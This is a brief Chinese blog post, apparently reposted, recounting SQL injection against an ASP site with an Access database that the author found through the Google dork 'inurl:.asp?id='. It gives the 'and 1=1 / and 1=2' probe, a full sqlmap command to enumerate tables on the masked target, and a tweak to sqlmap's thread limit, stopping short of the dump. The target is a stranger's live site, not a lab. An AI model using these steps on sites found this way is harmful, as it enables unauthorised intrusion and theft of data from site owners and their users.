SQLMAP注入Access數據庫


今天偶遇一Access數據庫

1.首先嘗試是否存在注入點,and1=1,and 1=2,發現返回信息不一樣

 

2.使用sqlmap脫褲,發現時Access數據庫,不能提權,

3.那就直接暴庫吧,sqlmap.py -u http://www.XXX.cc/common.asp?id=2%20and%201=2 --tables

期間因為線程太慢了,去配置文件改了一下線程

找到\lib\core\settings.py,打開文件,搜索MAX_NUMBER_OF_THREADS,將數值改為你想要的最大線程數。

5.接下來就該dump了,作為一個守法的好公民,就不繼續了。

站點是google hacking 搜索出來的asp的站點

inurl:.asp?id=

 

 

以上內容只是作為自學記錄。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM